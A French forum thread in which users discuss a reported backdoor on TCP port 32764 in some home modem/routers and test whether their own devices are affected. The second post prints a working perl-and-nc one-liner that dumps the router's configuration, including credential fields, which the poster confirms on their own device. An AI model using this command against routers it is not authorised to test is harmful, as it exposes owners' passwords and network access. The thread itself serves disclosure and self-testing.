Backdoor sur les modem/routeur port 32764 ==> centralisation infos

Backdoor sur les modem/routeur port 32764 ==> centralisation infos - Sécurité - Réseaux grand public / SoHo

Marsh Posté le 02-01-2014 à 16:18:43    

Bonjour, une information vient de sortir, certains modem/routeurs contiendraient une backdoor permettant de récupérer à distance la conf du routeur et surtout son mot de passe...
L'article en question:
http://www.numerama.com/magazine/2 [...] tgear.html

 

Les sources et les informations:
https://github.com/elvanderb/TCP-32764

 


Ce topic aura donc pour but de centraliser les informations, voir si votre modem/routeur est touché ou pas.

 

Je possède un netgear V2 dg834G. Je testerais le script. J'ai testé un telnet sur le port 32764 il ne me répond visiblement rien... Et un nmap dans le réseau interne sur le routeur, ne me donne que le port 80 (donc l'interface admin).

 


Au niveau de la faille est-elle atteignable depuis l'extérieur ou juste depuis le réseau interne?


Message édité par burn2 le 02-01-2014 à 16:24:45

---------------
"C'est vrai qu'un type aussi pénible de jour on serait en droit d'espérer qu'il fasse un break de nuit mais bon …"
Reply

Marsh Posté le 02-01-2014 à 16:18:43   

Reply

Marsh Posté le 02-01-2014 à 16:29:52    

Je viens de tester avec ces commandes:

Citation :


perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_


 
Et il me répond bien exactement ma conf!!!! Donc faille confirmée pour mon modem routeur!


---------------
"C'est vrai qu'un type aussi pénible de jour on serait en droit d'espérer qu'il fasse un break de nuit mais bon …"
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed